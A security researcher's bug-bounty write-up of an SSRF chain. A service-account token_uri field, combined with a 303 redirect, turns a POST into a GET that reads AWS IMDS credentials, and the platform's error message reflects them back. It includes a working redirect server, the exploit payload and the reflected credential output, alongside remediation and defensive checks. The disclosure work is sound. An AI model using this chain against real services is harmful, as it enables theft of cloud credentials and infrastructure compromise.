A POST to IMDS may fail — but a redirect can quietly turn it into something else.

This writeup documents the chain from a URL-typed field inside a service account credential JSON to live AWS IAM credentials on a Kubernetes worker node. The chain depends on four components composing into a single vulnerability: a URL-accepting field with no allowlist, an HTTP client with default redirect handling, an unauthenticated metadata service, and an error path that reflected response content. Any one of them, configured differently, breaks the exploit.

The single observation that makes the chain work: when a server-side request forgery can only send POST requests and the target endpoint only answers GETs, most researchers close the laptop. HTTP 303 See Other, defined in RFC 7231 section 6.4.4 and unchanged since 2014, instructs an RFC-compliant HTTP client to convert the POST into a GET when following the redirect. That detail was the difference between a medium-severity SSRF and a full cloud compromise.

None of the components in this chain are bugs on their own. The composition is.

The Feature: A Data Warehouse Integration

The target platform let enterprise customers connect their own data warehouse and sync user data into the platform's engagement graph. A common B2B pattern: the customer provides connection parameters, the platform periodically pulls data across the boundary.

Four warehouse types were supported. Three of them used conventional credentials (username/password, JDBC strings, host plus access token). The fourth accepted a Google Cloud Platform service account JSON document. That fourth option was immediately the most interesting: a GCP service account JSON is not a credential in the traditional sense. It is a configuration document containing multiple URL fields, each of which tells the client library where to make outbound HTTP requests. The most important is token_uri, which specifies the OAuth 2.0 token endpoint where the library sends a signed JWT in exchange for an access token.

When I opened the integration setup page and watched the request to the some_connection endpoint in DevTools, one parameter jumped out:

"security_config": {
  "service_account_creds": "{\"type\":\"service_account\",\"private_key\":\"...\",\"token_uri\":\"https://oauth2.googleapis.com/token\",\"client_email\":\"...\"}"
}

A JSON string embedded inside a JSON object, with token_uri buried inside. The dashboard sent it straight to the server. No client-side URL parse, no allowlist check, no domain restriction. Whatever was typed in the credentials JSON was forwarded verbatim to the backend. The question was whether the backend did any validation of its own.
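The double encoding matters when building payloads by hand: the credentials document is JSON-serialized twice, once as the inner document and once as a string value in the outer body. A minimal sketch of the round trip (field values are placeholders, not the platform's real schema):

```python
import json

# Inner document: GCP service-account-format JSON (placeholder values)
creds = {
    "type": "service_account",
    "private_key": "-----BEGIN PRIVATE KEY-----\n...\n-----END PRIVATE KEY-----\n",
    "token_uri": "https://oauth2.googleapis.com/token",
    "client_email": "svc@example.iam.gserviceaccount.com",
}

# Outer request body: the inner document is embedded as a *string*,
# so it picks up a second layer of JSON escaping on the wire
body = {"security_config": {"service_account_creds": json.dumps(creds)}}
wire = json.dumps(body)

# Decoding requires two json.loads calls, one per layer
inner = json.loads(json.loads(wire)["security_config"]["service_account_creds"])
print(inner["token_uri"])  # https://oauth2.googleapis.com/token
```

The escaped quotes in the DevTools capture above are exactly this second encoding layer.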

First Contact: Confirming the SSRF

I set up an Interactsh out-of-band listener and put its URL into token_uri:

"token_uri": "https://[oob-host].oast.pro/REDACTED-probe-1"

Then I POSTed to some_connection with a syntactically valid service account JSON: a locally generated 2048-bit PKCS8 RSA private key, a plausible client_email, and a project/dataset pair that did not need to exist, since authentication would fail before any real database was contacted.

Within a second, the listener lit up:

POST /REDACTED-probe-1 HTTP/1.1
Host: [oob-host].oast.pro
User-Agent: google-auth/2.x python-requests/2.x
Content-Type: application/x-www-form-urlencoded

grant_type=urn%3Aietf%3Aparams%3Aoauth%3Agrant-type%3Ajwt-bearer&assertion=<JWT>

That one interaction told me several things at once:

1. The server takes token_uri and makes an HTTP request to it. SSRF vector confirmed.

2. The source IP was AWS us-east-1. Matches the platform's infrastructure.

3. The User-Agent identified the client library as Python's google-auth, wrapping the requests session transport.

4. The method was POST, the body was a textbook OAuth 2.0 JWT Bearer exchange. google-auth signs a JWT with the service account's private key, POSTs it to token_uri, and expects back a JSON body with an access_token field.

5. Round-trip time: ~1.5 seconds. Useful for later timing comparisons.

I had a confirmed SSRF. I controlled the destination URL, I knew the exact HTTP method (POST), the body format, and the client library. But a generic outbound-POST bug is where the interesting work starts, not ends.

The Real Target: AWS IMDS

AWS EC2 instances, including Kubernetes worker nodes in most EKS deployments, expose an Instance Metadata Service at `169.254.169.254`. IMDS returns instance metadata and, most importantly, **live temporary AWS credentials for whatever IAM role is bound to the instance's profile.**

The credentials path:

http://169.254.169.254/latest/meta-data/iam/security-credentials/<role-name>

A GET request returns a JSON document with AccessKeyId, SecretAccessKey, and Token. Any AWS SDK in the world accepts those as valid credentials. If the pod could reach IMDS, and my SSRF could make an authenticated HTTP request to that path, I would read live credentials for the EKS node role. Highest-value outcome possible.

I started with the obvious:

"token_uri": "http://169.254.169.254/latest/meta-data/iam/security-credentials/"

Generic warehouse-connection error back. Nothing from IMDS reflected. Same story with role-name guesses in the URL.

The default assumption here is that IMDS is blocked. The Kubernetes network policy forbids pod traffic to 169.254.169.254, or the node's security group drops the connection. In most modern EKS deployments, that assumption is correct. But I had no evidence of what was actually happening. An empty response body is compatible with many failure modes. The right move was an experiment that would reveal where the block lived.

The Timing Oracle

I sent three probes back-to-back, each with a different target in token_uri, and measured the round-trip time on each.

  • External server I controlled (http://[oob-host].oast.pro/) came back in ~1.5 seconds.
  • Unroutable IP (http://10.255.255.1/, RFC 1918 private space, nothing on the path routes it) came back in ~28 seconds.
  • IMDS itself (http://169.254.169.254/...) came back in ~0.34 seconds.

That last number is the one that changed everything, because it is incompatible with a network-layer block. If the Kubernetes network policy or the node's security group were dropping traffic to 169.254.169.254, the response time would have matched the unroutable baseline. Instead it came back in a third of a second, which means the TCP connection succeeded, the HTTP exchange completed, and a response arrived quickly. IMDS was reachable at the network layer. The problem had to be somewhere higher in the stack.
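The inference generalizes into a rough classifier. A sketch, with thresholds derived from the baselines measured above (they are illustrative for this one network, not universal constants):

```python
def classify_rtt(rtt_s: float,
                 external_baseline_s: float = 1.5,
                 drop_baseline_s: float = 28.0) -> str:
    """Map a probe's round-trip time to the most likely failure mode."""
    if rtt_s >= drop_baseline_s * 0.5:
        # Matches the unroutable baseline: packets are being dropped
        # and the client burned its connect timeout
        return "filtered at the network layer"
    if rtt_s <= external_baseline_s:
        # At or below a real external round trip: TCP connected
        # and an HTTP response came back
        return "reachable; failure is higher in the stack"
    return "ambiguous; needs more probes"

print(classify_rtt(0.34))  # reachable; failure is higher in the stack
print(classify_rtt(28.0))  # filtered at the network layer
```

The 0.34-second IMDS probe lands squarely in the "reachable" band, which is what justified digging into the application layer next.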

Then the AWS documentation line I had been missing:

IMDS responds with HTTP 405 Method Not Allowed for non-GET requests to metadata paths.

Of course. google-auth was POSTing. IMDS only answered GETs. The POST was getting a 405 with no body. google-auth saw no access token to parse. The integration code caught the exception and returned a generic warehouse error. The SSRF was working perfectly. The protocol on my side (POST) simply did not match the protocol IMDS responds to (GET).

This is where most researchers submit the finding as-is and move on. The correct move is a more specific question: what piece of this system, exactly, is committing to the POST method, and can that commitment be broken?

The Idea: HTTP 303 See Other

The method is decided by the OAuth library. google-auth sends POSTs because that is what the OAuth 2.0 JWT Bearer grant flow specifies. Hardcoded. Not changeable.

But the method is only decided once. After that, the HTTP client takes over, and the HTTP client follows its own rules about redirects. That was the seam.

The testable question: does Python's requests library follow HTTP 303 automatically, and does it rewrite the method per the RFC?

The requests source confirmed it. The relevant logic is in requests.sessions.SessionRedirectMixin.rebuild_method:

if response.status_code == codes.see_other and method != 'HEAD':
    method = 'GET'

requests.Session.send calls self.resolve_redirects by default (allow_redirects=True). Unless the caller explicitly passes allow_redirects=False, a POST-with-303-response gets rewritten to GET against the Location URL automatically. And google-auth's transport uses requests.Session() with no redirect modifications. It calls .send() and parses the final response, whatever it is.
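The rewrite is easy to confirm locally with no target involved. A self-contained sketch (throwaway localhost server; all names here are mine) showing requests turning a POST into a GET on a 303:

```python
import threading
from http.server import BaseHTTPRequestHandler, HTTPServer

import requests

seen = []  # records method and path for every request the server handles

class Redirector(BaseHTTPRequestHandler):
    def do_POST(self):
        seen.append(f"POST {self.path}")
        self.send_response(303)                  # See Other
        self.send_header("Location", "/final")
        self.send_header("Content-Length", "0")
        self.end_headers()

    def do_GET(self):
        seen.append(f"GET {self.path}")
        body = b"redirected"
        self.send_response(200)
        self.send_header("Content-Length", str(len(body)))
        self.end_headers()
        self.wfile.write(body)

    def log_message(self, *args):                # silence request logging
        pass

server = HTTPServer(("127.0.0.1", 0), Redirector)
threading.Thread(target=server.serve_forever, daemon=True).start()

# allow_redirects defaults to True, the same default google-auth inherits
resp = requests.post(f"http://127.0.0.1:{server.server_address[1]}/token",
                     data={"grant_type": "jwt-bearer"})
server.shutdown()

print(seen)                 # ['POST /token', 'GET /final']
print(resp.request.method)  # GET
```

One POST in, one GET out, no opt-in from the caller. That is the seam the rest of the chain rides on.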

The plan:

1. Put a URL I control into token_uri.

2. google-auth POSTs to my URL with the signed JWT.

3. My server responds 303 See Other with Location: http://169.254.169.254/latest/meta-data/iam/security-credentials/<role-name>.

4. requests follows the redirect and rewrites POST to GET.

5. IMDS accepts the GET and returns credentials JSON.

6. google-auth fails to parse the response as an OAuth token document and raises RefreshError.

7. If the integration's error path includes the exception string in its response, the IMDS credentials are reflected across the network boundary.

The Full Chain

Before executing the plan, here is the complete flow end-to-end. Each step is a component doing exactly what it was designed to do. Each ⚠ marks a point where a different configuration would have broken the chain.

  1. Customer-supplied token_uri reaches the platform backend. ⚠ no allowlist on token_uri
  2. google-auth POSTs the signed JWT to the attacker's server.
  3. The attacker's server answers 303 See Other with an IMDS path in Location. ⚠ allow_redirects=True rewrites POST to GET
  4. requests GETs http://169.254.169.254/latest/meta-data/... ⚠ IMDSv1 reachable from the pod
  5. google-auth raises RefreshError containing the IMDS body. ⚠ exception string reflected in the API error

Four ⚠ markers. Four places where a reasonable, widely documented, often recommended configuration change would have broken the chain before it reached the credentials. None of them were applied together. That is the whole finding.

Setting the Trap

I needed a public server with a stable IP that could receive the platform's outbound traffic. My home IP, already confirmed reachable by the Interactsh probe, was fine.

The redirect server was Python standard library:

```python
# Minimal 303 redirect server: logs the inbound POST, replies with a Location header
import sys
from http.server import BaseHTTPRequestHandler, HTTPServer

TARGET = sys.argv[1] if len(sys.argv) > 1 else "http://169.254.169.254/latest/meta-data/iam/info"

class Handler(BaseHTTPRequestHandler):
    def do_POST(self):
        # Log the inbound POST (method, headers, body) for evidence
        length = int(self.headers.get("Content-Length", 0))
        body = self.rfile.read(length)
        print(self.requestline, dict(self.headers), body, flush=True)
        self.send_response(303)
        self.send_header("Location", TARGET)
        self.send_header("Content-Length", "0")
        self.end_headers()

if __name__ == "__main__":
    HTTPServer(("0.0.0.0", 7777), Handler).serve_forever()
```
Bound to `0.0.0.0:7777`, port-forwarded at the router. Logs inbound requests to stdout, responds with `303 See Other` to whatever path is passed on the command line. Changing the IMDS target was a server restart with different arguments.


The exploit payload against `some_connection`:
```json
{
  "data_warehouse_type": "[REDACTED]",
  "project": "bugbounty-project",
  "dataset": "bugbounty_dataset",
  "security_config": {
    "service_account_name": "svc@[REDACTED].iam.gserviceaccount.com",
    "service_account_creds": "{\"type\":\"service_account\",\"private_key\":\"<PKCS8 RSA KEY>\",\"token_uri\":\"http://[attacker-ip]:7777/creds\",\"client_email\":\"svc@[REDACTED].iam.gserviceaccount.com\",\"universe_domain\":\"googleapis.com\"}"
  }
}
```

The private_key is a locally-generated 2048-bit RSA key. It does not correspond to any real GCP service account. google-auth uses it only to sign the outbound JWT, and since the OAuth server it talks to is actually my redirect script, the signature is never validated. The key just needs to parse as PKCS8 PEM. client_email and universe_domain similarly exist only to make the JSON parse cleanly. The entire blob is syntactically valid GCP-format JSON.
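Generating such a throwaway key requires no GCP interaction at all. A sketch using the `cryptography` package (any tool emitting PKCS8 PEM works equally well, e.g. `openssl genpkey`):

```python
from cryptography.hazmat.primitives import serialization
from cryptography.hazmat.primitives.asymmetric import rsa

# Throwaway 2048-bit RSA key; corresponds to no real GCP service account
key = rsa.generate_private_key(public_exponent=65537, key_size=2048)

pem = key.private_bytes(
    encoding=serialization.Encoding.PEM,
    format=serialization.PrivateFormat.PKCS8,       # google-auth expects PKCS8
    encryption_algorithm=serialization.NoEncryption(),
).decode()

print(pem.splitlines()[0])  # -----BEGIN PRIVATE KEY-----
```

When this PEM string passes through json.dumps, its real newlines become the `\n` escapes visible in the payload above.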

First Shot

For the first test, I pointed the redirect at /latest/meta-data/iam/info rather than the credentials path. Two reasons: I did not know the IAM role name yet (needed to build the correct security-credentials/<role> URL), and /iam/info returns harmless metadata instead of credentials, a safer first payload for validation.

Redirect server started, some_connection fired. About 1.4 seconds later:

{
  "result": "error",
  "message": "Error connecting to warehouse: Error executing SQL due to customer config: ('No access token in response.', {'Code': 'Success', 'LastUpdated': '2026-04-02T03:28:39Z', 'InstanceProfileArn': 'arn:aws:iam::[REDACTED-ACCOUNT]:instance-profile/[REDACTED-ROLE]', 'InstanceProfileId': '[REDACTED]'})"
}

Read that slowly. "No access token in response." is google-auth's error when the response from token_uri does not parse as an OAuth token document. The Python dict that follows it, containing Code, LastUpdated, InstanceProfileArn, and InstanceProfileId, is the literal body of the IMDS response, parsed as JSON by google-auth and rendered back as a dict repr() when the exception was formatted.

Three things became simultaneously true: the 303 redirect chain worked, the IMDS response body was reflected across the network boundary, and I now knew the AWS account number and the IAM role name.
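The reflection mechanics are reproducible in isolation. Python formats a multi-argument exception as the repr of its args tuple, so a library that raises with the parsed response body as a second argument will smuggle that body into any error string built from the exception. A simplified model of the pattern (my sketch, not google-auth's or the platform's actual code):

```python
# Stand-in for the IMDS response body that came back through the redirect
imds_body = {
    "Code": "Success",
    "InstanceProfileArn": "arn:aws:iam::111122223333:instance-profile/node-role",
}

try:
    # The library expected an OAuth token document; IMDS JSON has no access_token,
    # so it raises with the whole parsed body attached as a second argument
    if "access_token" not in imds_body:
        raise Exception("No access token in response.", imds_body)
except Exception as exc:
    # str() of a multi-argument exception is the args tuple's repr:
    # the entire response body rides along into the user-facing message
    message = f"Error connecting to warehouse: {exc}"

print(message)
```

The output has exactly the shape of the platform's error above: the fixed string, then the full dict, tuple-wrapped.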

My redirect server confirmed the transaction:

POST /creds HTTP/1.1
User-Agent: google-auth/2.17.3 python-requests/2.31.0
Content-Type: application/x-www-form-urlencoded
Body: grant_type=urn%3Aietf%3Aparams%3Aoauth%3Agrant-type%3Ajwt-bearer&assertion=eyJhbGc...
Response: 303 → http://169.254.169.254/latest/meta-data/iam/info

google-auth making its OAuth POST, receiving the 303, transparently following the redirect to IMDS as the RFC specifies. The exploit was live.

Getting the Credentials

Restarted the redirect server pointed at the role-specific credentials path:

python3 redirect.py "http://169.254.169.254/latest/meta-data/iam/security-credentials/[REDACTED-ROLE]"

Fired some_connection again. The response, reproduced verbatim because this is the finding in one body:

{
  "result": "error",
  "message": "Error connecting to warehouse: 
Error executing SQL due to customer config: 
('No access token in response.', 
{'Code': 'Success', 'LastUpdated': '2026-04-02T03:42:08Z', 'Type': 'AWS-HMAC', 
'AccessKeyId': 'ASIA[REDACTED]', 'SecretAccessKey': '[REDACTED]', 
'Token': 'IQoJb3JpZ2luX2VjE[REDACTED]', 'Expiration': '2026-04-02T09:43:36Z'})"
}

Live AWS temporary credentials for the Kubernetes worker node role. Access key, secret access key, session token, expiration. Wrapped in AWS-HMAC, which any AWS SDK accepts.

Per the program's rules of engagement, I did not use these credentials to make any AWS API calls. The rules forbid viewing data beyond what is needed to prove the bug. The credentials were the proof. Using them would have been a rules violation. One additional probe confirmed the instance identity:

{
  "accountId": "[REDACTED]",
  "availabilityZone": "us-east-1a",
  "imageId": "ami-[REDACTED]",
  "instanceId": "i-[REDACTED]",
  "instanceType": "c6i.8xlarge",
  "region": "us-east-1"
}

Real AWS account. Real AMI. A 32-vCPU compute-optimized node. Production-grade infrastructure, not a sandbox.

Four Aligned Failures

The chain worked because four things were simultaneously true. Fixing any one breaks the exploit. Fixing all four makes the platform resilient.

1. token_uri was not validated against an allowlist. The service account JSON was treated as opaque customer configuration. No check that the URL pointed to a Google-controlled domain, no scheme restriction, no RFC 1918 or link-local block. This is the primary failure and the easiest fix.

2. requests.Session followed redirects by default, including 303 with method rewriting. General-purpose HTTP client behavior. allow_redirects=True is the default on every method, and google-auth does not override it. RFC-compliant. No bug in either library. This is a composition hazard, not a library vulnerability.

3. IMDSv1 was enabled and reachable from the pod. No session-token requirement, and the Kubernetes network policy allowed pod traffic to 169.254.169.254. AWS has been urging customers to switch to IMDSv2-required mode for years, and this finding demonstrates why. Even basic HttpTokens=required breaks the chain: the attacker cannot perform the PUT-first token exchange via a one-shot requests.get() after a redirect.

4. The error path reflected the raw exception string. Without this, the SSRF degrades to blind, requiring timing or size inference. With it, the read is fully content-disclosing: whatever IMDS path the redirect targets comes back in the error message. The hardest component for developers to notice because verbose error output is usually considered good developer experience.
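Why item 3's fix works is worth seeing concretely. A self-contained sketch that mocks IMDSv2's token requirement on localhost (a stand-in with simplified semantics, not real IMDS) and shows the redirect-shaped one-shot GET failing where the PUT-then-GET flow succeeds:

```python
import threading
from http.server import BaseHTTPRequestHandler, HTTPServer

import requests

TOKEN = "mock-imdsv2-token"

class MockIMDSv2(BaseHTTPRequestHandler):
    def do_PUT(self):
        # IMDSv2: a session token is only issued via PUT with a TTL header
        if (self.path == "/latest/api/token"
                and "X-aws-ec2-metadata-token-ttl-seconds" in self.headers):
            self._reply(200, TOKEN)
        else:
            self._reply(400, "")

    def do_GET(self):
        # Metadata paths require the session token header
        if self.headers.get("X-aws-ec2-metadata-token") == TOKEN:
            self._reply(200, '{"Code": "Success"}')
        else:
            self._reply(401, "")

    def _reply(self, code, body):
        data = body.encode()
        self.send_response(code)
        self.send_header("Content-Length", str(len(data)))
        self.end_headers()
        self.wfile.write(data)

    def log_message(self, *args):
        pass

server = HTTPServer(("127.0.0.1", 0), MockIMDSv2)
base = f"http://127.0.0.1:{server.server_address[1]}"
threading.Thread(target=server.serve_forever, daemon=True).start()

# What a followed 303 amounts to: a single bare GET. Rejected.
blind = requests.get(f"{base}/latest/meta-data/iam/security-credentials/role")

# The legitimate two-step flow: PUT for a token, then GET with the token header.
tok = requests.put(f"{base}/latest/api/token",
                   headers={"X-aws-ec2-metadata-token-ttl-seconds": "60"}).text
authed = requests.get(f"{base}/latest/meta-data/iam/security-credentials/role",
                      headers={"X-aws-ec2-metadata-token": tok})
server.shutdown()

print(blind.status_code, authed.status_code)  # 401 200
```

A redirect-following HTTP client has no way to perform the stateful PUT-then-GET dance, which is exactly why IMDSv2-required mode neutralizes this class of SSRF.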

Remediation and Verification

A week after reporting, I came back to verify the fix.

Same payload, fresh session, new account, redirect server on the same IP. The response:

{
  "error": "... Untrusted token_uri in service account credentials: http://[attacker-ip]:7777/creds. Only standard Google OAuth2 token endpoints are allowed: frozenset({'https://oauth2.googleapis.com/token', 'https://accounts.google.com/o/oauth2/token'})"
}

HTTP 400. Blocked at input validation.

A legitimate token_uri (https://oauth2.googleapis.com/token) confirmed the fix did not break valid usage: HTTP 201 Created, source provisioned. The downstream connection still failed for a different reason (the synthetic credentials were not real), but token_uri no longer triggered rejection.

The right fix. Allowlist approach, implemented at the field-parsing layer, so any new code path touching the same service account JSON inherits the protection. They did not pursue allow_redirects=False in google-auth, which is fine: the allowlist makes redirect behavior moot. The frozenset(…) in the error message tells me the check lives in the Python worker layer, which is the correct place.
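The shape of that check, reconstructed from the error message (a sketch of the pattern, not the vendor's code):

```python
ALLOWED_TOKEN_URIS = frozenset({
    "https://oauth2.googleapis.com/token",
    "https://accounts.google.com/o/oauth2/token",
})

def validate_token_uri(token_uri: str) -> str:
    # Exact string match: no substring, prefix, or hostname checks that
    # a crafted URL (embedded @, lookalike hosts, odd ports) could bypass
    if token_uri not in ALLOWED_TOKEN_URIS:
        raise ValueError(
            f"Untrusted token_uri in service account credentials: {token_uri}. "
            f"Only standard Google OAuth2 token endpoints are allowed: {ALLOWED_TOKEN_URIS}"
        )
    return token_uri
```

Exact matching sidesteps the long tail of URL-parsing bypasses that plague host- and prefix-based allowlists, at the acceptable cost of rejecting nonstandard but legitimate endpoints.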

Vulnerability closed.

The single observation I want to leave for anyone reading this, defender or researcher:

"Make an outbound HTTP request to this URL" is the single most dangerous feature a web application can expose. Treat every field that accepts one as if it were `eval()` of a URL, because functionally, that is what it is.

Every time. Every field. Every integration. Every "just pass it through to the library."

This chain was a composition hazard dressed up as a configuration option. It was waiting in the schema of a well-known OAuth credential format for anyone who looked at the token_uri field and asked what it does. It was patched quickly and correctly. And it will exist, in some other form, in some other product, next week, until the pattern itself becomes unthinkable. Until then, the job is unchanged. Read the code. Time the requests. Question the composition. Push past the first error response. Assume reflection. Try 303.

When a primitive gives you the wrong verb, do not give up on the primitive. Give up on the verb.